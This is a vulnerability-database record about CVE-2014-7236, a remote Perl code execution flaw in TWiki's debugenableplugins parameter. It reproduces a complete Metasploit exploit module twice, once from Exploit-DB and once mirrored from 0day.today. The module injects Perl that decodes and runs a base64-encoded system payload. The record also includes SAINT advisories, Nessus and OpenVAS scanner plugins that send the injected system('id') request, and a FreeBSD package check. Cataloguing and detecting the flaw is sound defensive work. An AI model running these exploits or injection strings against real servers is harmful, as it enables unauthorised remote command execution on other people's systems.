{"id": "EDB-ID:36438", "hash": "81bd4448d3183bd6645d8e55e2d07c30", "type": "exploitdb", "bulletinFamily": "exploit", "title": "TWiki Debugenableplugins Remote Code Execution", "description": "TWiki Debugenableplugins Remote Code Execution. CVE-2014-7236. Remote exploit for php platform", "published": "2015-03-19T00:00:00", "modified": "2015-03-19T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/36438/", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2014-7236"], "lastseen": "2016-02-04T03:30:52", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2016-02-04T03:30:52"}, "dependencies": {"references": [{"type": "dsquare", "idList": ["E-476"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105097"]}, {"type": "nessus", "idList": ["TWIKI_DEBUGENABLEPLUGINS_RCE.NASL", "FREEBSD_PKG_21CE1840610711E49E840022156E8794.NASL"]}, {"type": "freebsd", "idList": ["21CE1840-6107-11E4-9E84-0022156E8794"]}, {"type": "zdt", "idList": ["1337DAY-ID-23393", "1337DAY-ID-22741"]}, {"type": "saint", "idList": ["SAINT:F03A9A69EC3A1F89903D4B7738E81DBC", "SAINT:DE75E9D372982B283378BE3ED3ABE01E", "SAINT:3A49E540B9026A5C1EB0F5D89CA45A9F"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:130906", "PACKETSTORM:128623"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/HTTP/TWIKI_DEBUG_PLUGINS"]}], "modified": "2016-02-04T03:30:52"}, "vulnersScore": 0.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/36438/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'TWiki Debugenableplugins Remote Code Execution',\r\n 'Description' => %q{\r\n TWiki 4.0.x-6.0.0 contains a vulnerability in the Debug functionality.\r\n The value of the debugenableplugins parameter is used without proper sanitization\r\n in an Perl eval statement which allows remote code execution\r\n },\r\n 'Author' =>\r\n [\r\n 'Netanel Rubin', # from Check Point - Discovery\r\n 'h0ng10', # Metasploit Module\r\n\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-7236'],\r\n [ 'OSVDB', '112977'],\r\n [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236']\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl python php',\r\n }\r\n },\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Oct 09 2014'))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"TWiki path\", '/do/view/Main/WebHome' ]),\r\n OptString.new('PLUGIN', [true, \"A existing TWiki Plugin\", 'BackupRestorePlugin'])\r\n ], self.class)\r\n end\r\n\r\n\r\n def send_code(perl_code)\r\n uri = target_uri.path\r\n data = \"debugenableplugins=#{datastore['PLUGIN']}%3b\" + CGI.escape(perl_code) + \"%3bexit\"\r\n\r\n res = send_request_cgi!({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'data' => data\r\n })\r\n\r\n return res\r\n end\r\n\r\n\r\n def check\r\n rand_1 = rand_text_alpha(5)\r\n rand_2 = rand_text_alpha(5)\r\n\r\n code = \"print(\\\"Content-Type:text/html\\\\r\\\\n\\\\r\\\\n#{rand_1}\\\".\\\"#{rand_2}\\\")\"\r\n res = send_code(code)\r\n\r\n if res and res.code == 200\r\n return CheckCode::Vulnerable if res.body == rand_1 + rand_2\r\n end\r\n CheckCode::Unknown\r\n end\r\n\r\n\r\n def exploit\r\n code = \"print(\\\"Content-Type:text/html\\\\r\\\\n\\\\r\\\\n\\\");\"\r\n code += \"require('MIME/Base64.pm');MIME::Base64->import();\"\r\n code += \"system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit\"\r\n res = send_code(code)\r\n handler\r\n\r\n end\r\n\r\nend", "osvdbidlist": ["112977"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"saint": [{"lastseen": "2017-01-10T14:03:40", "bulletinFamily": "exploit", "description": "Added: 03/30/2015 \nCVE: [CVE-2014-7236](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7236>) \nBID: [70372](<http://www.securityfocus.com/bid/70372>) \nOSVDB: [112977](<http://www.osvdb.org/112977>) \n\n\n### Background\n\n[TWiki](<http://www.twiki.org/>) is a web-based collaboration platform written in PERL. \n\n### Problem\n\nThe TWiki view script does not properly sanitize the `**debugenableplugins**` parameter before using it. \n\n### Resolution\n\nUpgrade to TWiki-6.0.1 or higher, or apply the hotfix shown in the [TWiki Security Alert](<http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236>). \n\n### References\n\n<http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236> \n\n\n### Limitations\n\nExploit works on vulnerable TWiki installations that do not require authentication. If the protocol is https, exploit requires the IO::Socket::SSL Perl module to be installed on the SAINTexploit host. This module is available from <http://www.cpan.org/modules/by-module/IO/>. \n\n", "modified": "2015-03-30T00:00:00", "published": "2015-03-30T00:00:00", "id": "SAINT:F03A9A69EC3A1F89903D4B7738E81DBC", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/twiki_view_debugenableplugins", "title": "TWiki View Script debugenableplugins Request Parameter Vulnerability", "type": "saint", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-12-14T16:58:05", "bulletinFamily": "exploit", "description": "Added: 03/30/2015 \nCVE: [CVE-2014-7236](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7236>) \nBID: [70372](<http://www.securityfocus.com/bid/70372>) \nOSVDB: [112977](<http://www.osvdb.org/112977>) \n\n\n### Background\n\n[TWiki](<http://www.twiki.org/>) is a web-based collaboration platform written in PERL. \n\n### Problem\n\nThe TWiki view script does not properly sanitize the `**debugenableplugins**` parameter before using it. \n\n### Resolution\n\nUpgrade to TWiki-6.0.1 or higher, or apply the hotfix shown in the [TWiki Security Alert](<http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236>). \n\n### References\n\n<http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236> \n\n\n### Limitations\n\nExploit works on vulnerable TWiki installations that do not require authentication. If the protocol is https, exploit requires the IO::Socket::SSL Perl module to be installed on the SAINTexploit host. This module is available from <http://www.cpan.org/modules/by-module/IO/>. \n\n", "modified": "2015-03-30T00:00:00", "published": "2015-03-30T00:00:00", "id": "SAINT:DE75E9D372982B283378BE3ED3ABE01E", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/twiki_view_debugenableplugins", "type": "saint", "title": "TWiki View Script debugenableplugins Request Parameter Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "description": "Added: 03/30/2015 \nCVE: [CVE-2014-7236](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7236>) \nBID: [70372](<http://www.securityfocus.com/bid/70372>) \nOSVDB: [112977](<http://www.osvdb.org/112977>) \n\n\n### Background\n\n[TWiki](<http://www.twiki.org/>) is a web-based collaboration platform written in PERL. \n\n### Problem\n\nThe TWiki view script does not properly sanitize the `**debugenableplugins**` parameter before using it. \n\n### Resolution\n\nUpgrade to TWiki-6.0.1 or higher, or apply the hotfix shown in the [TWiki Security Alert](<http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236>). \n\n### References\n\n<http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236> \n\n\n### Limitations\n\nExploit works on vulnerable TWiki installations that do not require authentication. If the protocol is https, exploit requires the IO::Socket::SSL Perl module to be installed on the SAINTexploit host. This module is available from <http://www.cpan.org/modules/by-module/IO/>. \n\n", "modified": "2015-03-30T00:00:00", "published": "2015-03-30T00:00:00", "id": "SAINT:3A49E540B9026A5C1EB0F5D89CA45A9F", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/twiki_view_debugenableplugins", "type": "saint", "title": "TWiki View Script debugenableplugins Request Parameter Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2019-11-01T02:37:12", "bulletinFamily": "scanner", "description": "TWiki developers report :\n\nThe debugenableplugins request parameter allows arbitrary Perl code\nexecution.\n\nUsing an HTTP GET request towards a TWiki server, add a specially\ncrafted debugenableplugins request parameter to TWiki", "modified": "2019-11-02T00:00:00", "id": "FREEBSD_PKG_21CE1840610711E49E840022156E8794.NASL", "href": "https://www.tenable.com/plugins/nessus/78816", "published": "2014-11-03T00:00:00", "title": "FreeBSD : twiki -- remote Perl code execution (21ce1840-6107-11e4-9e84-0022156e8794)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78816);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/02/07 9:34:55\");\n\n script_cve_id(\"CVE-2014-7236\");\n\n script_name(english:\"FreeBSD : twiki -- remote Perl code execution (21ce1840-6107-11e4-9e84-0022156e8794)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"TWiki developers report :\n\nThe debugenableplugins request parameter allows arbitrary Perl code\nexecution.\n\nUsing an HTTP GET request towards a TWiki server, add a specially\ncrafted debugenableplugins request parameter to TWiki's view script\n(typically port 80/TCP). Prior authentication may or may not be\nnecessary.\n\nA remote attacker can execute arbitrary Perl code to view and modify\nany file the webserver user has access to.\n\nExample:\nhttp://www.example.com/do/view/Main/WebHome?debugenableplugins=BackupR\nestorePlugin%3bprint('Content-Type:text/html\\r\\n\\r\\nVulnerable!')%3bex\nit\n\nThe TWiki site is vulnerable if you see a page with text\n'Vulnerable!'.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236\"\n );\n # https://vuxml.freebsd.org/freebsd/21ce1840-6107-11e4-9e84-0022156e8794.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e14ddd1d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"TWiki debugenableplugins RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki Debugenableplugins Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:twiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"twiki<5.1.4_1,1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-11-03T12:30:20", "bulletinFamily": "scanner", "description": "The version of TWiki installed on the remote host is affected by a\nremote code execution vulnerability due to a failure to properly\nsanitize user-supplied input to the ", "modified": "2019-11-02T00:00:00", "id": "TWIKI_DEBUGENABLEPLUGINS_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/82898", "published": "2015-04-20T00:00:00", "title": "TWiki 'debugenableplugins' Parameter RCE", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82898);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/08/01 17:36:12\");\n\n script_cve_id(\"CVE-2014-7236\");\n script_bugtraq_id(70372);\n\n script_name(english:\"TWiki 'debugenableplugins' Parameter RCE\");\n script_summary(english:\"Attempts to run a command using TWiki.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a CGI script that is affected by a remote\ncode execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of TWiki installed on the remote host is affected by a\nremote code execution vulnerability due to a failure to properly\nsanitize user-supplied input to the 'debugenableplugins' parameter\nupon submission to the 'view' script. A remote, unauthenticated \nattacker can exploit this issue to execute arbitrary Perl code subject\nto the privileges of the web server user id.\n\nNote that the application is reportedly also affected by a file upload\nvulnerability when installed on Windows hosts; however, Nessus has not\ntested for this issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://twiki.org/cgi-bin/view/Codev/TWikiRelease06x00x01\");\n script_set_attribute(attribute:\"see_also\", value:\"http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to TWiki version 6.0.1 or later. Alternatively, apply the\nhotfix referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"TWiki debugenableplugins RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki Debugenableplugins Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:twiki:twiki\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"twiki_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"installed_sw/TWiki\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"TWiki\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\n\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\nif (\"cgi-bin\" >!< dir)\n{\n dir = ereg_replace(pattern:\"(/[^/]+/).*\", string:dir, replace:\"\\1\");\n dir = dir + \"bin/\";\n}\nelse\n dir = dir - \"view\";\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig /all';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig /all');\n\ncmd_pats = make_array();\ncmd_pats['id'] = \"uid=[0-9]+.*gid=[0-9]+.*\";\ncmd_pats['ipconfig /all'] = \"Subnet Mask|IP(v(4|6)?)? Address\";\n\nforeach cmd (cmds)\n{\n\n url = \"view/Main/WebHome?debugenableplugins=BackupRestorePlugin%3bprint\"+\n '(\"Content-Type:text/html\\\\r\\\\n\\\\r\\\\n\")%3bsystem('+\"'\"+cmd+\"')%3bexit\";\n\n res = http_send_recv3(\n method : \"GET\",\n item : dir + url,\n port : port,\n exit_on_fail : TRUE\n );\n\n if (egrep(pattern:cmd_pats[cmd], string:res[2]))\n {\n vuln = TRUE;\n break;\n }\n}\n\nif (!vuln) audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n cmd : cmd,\n line_limit : 2,\n request : make_list(build_url(qs:dir+url, port:port)),\n output : chomp(res[2])\n);\nexit(0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "dsquare": [{"lastseen": "2017-09-26T15:33:26", "bulletinFamily": "exploit", "description": "Remote code execution vulnerability in TWiki debugenableplugins\n\nVulnerability Type: Remote Command Execution", "modified": "2015-09-01T00:00:00", "published": "2015-09-01T00:00:00", "id": "E-476", "href": "", "type": "dsquare", "title": "TWiki debugenableplugins RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2019-01-07T12:18:03", "bulletinFamily": "scanner", "description": "TWiki is prone to remote code-execution vulnerability.", "modified": "2019-01-07T00:00:00", "published": "2014-10-27T00:00:00", "id": "OPENVAS:1361412562310105097", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105097", "title": "TWiki 'debugenableplugins' Parameter Remote Code Execution Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_twiki_70372.nasl 12952 2019-01-07 06:54:36Z ckuersteiner $\n#\n# TWiki 'debugenableplugins' Parameter Remote Code Execution Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:twiki:twiki\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105097\");\n script_bugtraq_id(70372);\n script_cve_id(\"CVE-2014-7236\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_version(\"$Revision: 12952 $\");\n\n script_name(\"TWiki 'debugenableplugins' Parameter Remote Code Execution Vulnerability\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2019-01-07 07:54:36 +0100 (Mon, 07 Jan 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-27 12:57:24 +0100 (Mon, 27 Oct 2014)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_twiki_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"twiki/detected\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/70372\");\n script_xref(name:\"URL\", value:\"http://twiki.org/\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this issue\n to execute arbitrary code in the context of the webserver user.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a HTTP GET request and check the response.\");\n\n script_tag(name:\"insight\", value:\"It is possible to execute arbitrary Perl code by adding a\n'debugenableplugins=' parameter with a specially crafted value.\");\n\n script_tag(name:\"solution\", value:\"Updates are available.\");\n script_tag(name:\"summary\", value:\"TWiki is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"TWiki 6.0.0, 5.1.0-5.1.4, 5.0.0-5.0.2, 4.3.0-4.3.2, 4.2.0-4.2.4, 4.1.0-4.1.2,\n4.0.0-4.0.5.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) dir = '';\n\ncmds = exploit_commands();\n\nforeach cmd ( keys( cmds ) ) {\n ex = '?debugenableplugins=BackupRestorePlugin%3bprint(\"Content-Type:text/html\\\\r\\\\n\\\\r\\\\n\")%3bprint(system(\"' +\n cmds[ cmd ] + '\"))%3bexit';\n url = dir + '/view/Main/WebHome' + ex;\n\n if( http_vuln_check( port:port, url:url, pattern:cmd, check_header:TRUE ) ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-04-14T13:53:16", "bulletinFamily": "exploit", "description": "TWiki versions 4.0.x through 6.0.0 contain a vulnerability in the Debug functionality. The value of the debugenableplugins parameter is used without proper sanitization in an Perl eval statement which allows remote code execution.", "modified": "2015-03-19T00:00:00", "published": "2015-03-19T00:00:00", "id": "1337DAY-ID-23393", "href": "https://0day.today/exploit/description/23393", "type": "zdt", "title": "TWiki Debugenableplugins Remote Code Execution Exploit", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'TWiki Debugenableplugins Remote Code Execution',\r\n 'Description' => %q{\r\n TWiki 4.0.x-6.0.0 contains a vulnerability in the Debug functionality.\r\n The value of the debugenableplugins parameter is used without proper sanitization\r\n in an Perl eval statement which allows remote code execution\r\n },\r\n 'Author' =>\r\n [\r\n 'Netanel Rubin', # from Check Point - Discovery\r\n 'h0ng10', # Metasploit Module\r\n \r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-7236'],\r\n [ 'OSVDB', '112977'],\r\n [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236']\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl python php',\r\n }\r\n },\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Oct 09 2014'))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"TWiki path\", '/do/view/Main/WebHome' ]),\r\n OptString.new('PLUGIN', [true, \"A existing TWiki Plugin\", 'BackupRestorePlugin'])\r\n ], self.class)\r\n end\r\n \r\n \r\n def send_code(perl_code)\r\n uri = target_uri.path\r\n data = \"debugenableplugins=#{datastore['PLUGIN']}%3b\" + CGI.escape(perl_code) + \"%3bexit\"\r\n \r\n res = send_request_cgi!({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'data' => data\r\n })\r\n \r\n return res\r\n end\r\n \r\n \r\n def check\r\n rand_1 = rand_text_alpha(5)\r\n rand_2 = rand_text_alpha(5)\r\n \r\n code = \"print(\\\"Content-Type:text/html\\\\r\\\\n\\\\r\\\\n#{rand_1}\\\".\\\"#{rand_2}\\\")\"\r\n res = send_code(code)\r\n \r\n if res and res.code == 200\r\n return CheckCode::Vulnerable if res.body == rand_1 + rand_2\r\n end\r\n CheckCode::Unknown\r\n end\r\n \r\n \r\n def exploit\r\n code = \"print(\\\"Content-Type:text/html\\\\r\\\\n\\\\r\\\\n\\\");\"\r\n code += \"require('MIME/Base64.pm');MIME::Base64->import();\"\r\n code += \"system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit\"\r\n res = send_code(code)\r\n handler\r\n \r\n end\r\n \r\nend\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/23393"}, {"lastseen": "2018-01-10T05:13:47", "bulletinFamily": "exploit", "description": "The debugenableplugins request parameter in Twiki versions 4.x, 5.x, and 6.0.0 allows arbitrary Perl code execution and suffer from a file upload bypass vulnerability.", "modified": "2014-10-10T00:00:00", "published": "2014-10-10T00:00:00", "id": "1337DAY-ID-22741", "href": "https://0day.today/exploit/description/22741", "type": "zdt", "title": "Twiki Perl 4.x, 5.x, 6.x Upload Bypass / Code Execution Vulnerabilities", "sourceData": "This is an advisory for TWiki administrators: The debugenableplugins request parameter allows arbitrary Perl code execution. Attaching a specially named file allows remote upload of an Apache configuration file. This applies to native TWiki installations on Windows, the TWiki-VM (virtual machine) running in a Windows server environment is not affected.\r\n\r\nTWiki ( http://twiki.org ) is an Open Source Enterprise Wiki and Web Application Platform used by millions of people.\r\n\r\n * Vulnerable Software Version\r\n * Attack Vectors\r\n * Impact\r\n * Severity Level\r\n * MITRE Name for this Vulnerability\r\n * Details\r\n * Countermeasures\r\n * Hotfix for TWiki Production Release 6.0.0\r\n * Hotfix for Older Affected TWiki Releases\r\n * Verify 